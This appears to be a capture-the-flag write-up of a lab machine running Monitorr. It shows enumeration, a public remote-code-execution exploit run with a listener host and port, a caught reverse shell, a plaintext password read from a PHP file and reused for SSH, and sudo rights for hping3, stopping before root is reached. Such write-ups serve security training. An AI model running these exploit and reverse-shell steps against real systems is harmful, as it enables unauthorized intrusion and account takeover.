Pwned Date - 14th Oct 2022

Enumeration

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 de:b5:23:89:bb:9f:d4:1a:b5:04:53:d0:b7:5c:b0:3f (RSA)
|   256 16:09:14:ea:b9:fa:17:e9:45:39:5e:3b:b4:fd:11:0a (ECDSA)
|_  256 9f:66:5e:71:b9:12:5d:ed:70:5a:4f:5a:8d:0d:65:d5 (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
| http-title:             Monitorr            | Monitorr        
|_Requested resource was <http://192.168.161.218/mon/>
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Untitled

┌──(kali㉿kali)-[~]
└─$ searchsploit monitorr
--------------------------------------------- ---------------------------------
 Exploit Title                               |  Path
--------------------------------------------- ---------------------------------
Monitorr 1.7.6m - Authorization Bypass       | php/webapps/48981.py
Monitorr 1.7.6m - Remote Code Execution (Una | php/webapps/48980.py
--------------------------------------------- ---------------------------------
Shellcodes: No Results

Exploitation

searchsploit -m 48980

┌──(kali㉿kali)-[~]
└─$ python3 48980.py 
specify params in format: python 48980.py target_url lhost lport

┌──(kali㉿kali)-[~]
└─$ python3 48980.py <http://192.168.161.218/mon/> 192.168.49.161 443
A shell script should be uploaded. Now we try to execute it

┌──(kali㉿kali)-[~]
└─$ nc -lvnp 443
listening on [any] 443 ...
connect to [192.168.49.161] from (UNKNOWN) [192.168.161.218] 34270
bash: cannot set terminal process group (570): Inappropriate ioctl for device
bash: no job control in this shell
www-data@icmp:/var/www/html/mon/assets/data/usrimg$ whoami
whoami
www-data

Privilege Escalation to fox user

It seems weird that we can execute a directory devel

www-data@icmp:/home/fox$ ls -la
ls -la
total 20
drwxr-xr-x 3 root root 4096 Dec  3  2020 .
drwxr-xr-x 3 root root 4096 Dec  3  2020 ..
lrwxrwxrwx 1 root root    9 Dec  3  2020 .bash_history -> /dev/null
drwx--x--x 2 fox  fox  4096 Dec  3  2020 devel
-rw-r--r-- 1 fox  fox    33 Oct 14 15:02 local.txt
-rw-r--r-- 1 root root   78 Dec  3  2020 reminder

www-data@icmp:/home/fox$ cat reminder
cat reminder
crypt with crypt.php: done, it works
work on decrypt with crypt.php: howto?!?

Even we do not have permission to ls devel but from the reminder we saw there is crypt.php

www-data@icmp:/home/fox$ **ls -la devel/crypt.php**
-rw-r--r-- 1 fox fox 56 Dec  3  2020 devel/crypt.php

www-data@icmp:/home/fox$ **cat devel/crypt.php**
<?php
echo crypt('BUHNIJMONIBUVCYTTYVGBUHJNI','da');
?>

sshpass -p "BUHNIJMONIBUVCYTTYVGBUHJNI" ssh [email protected]

Privilege Escalation to root user

Running sudo -l

Matching Defaults entries for fox on icmp:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin

User fox may run the following commands on icmp:
    (root) /usr/sbin/hping3 --icmp *
    (root) /usr/bin/killall hping3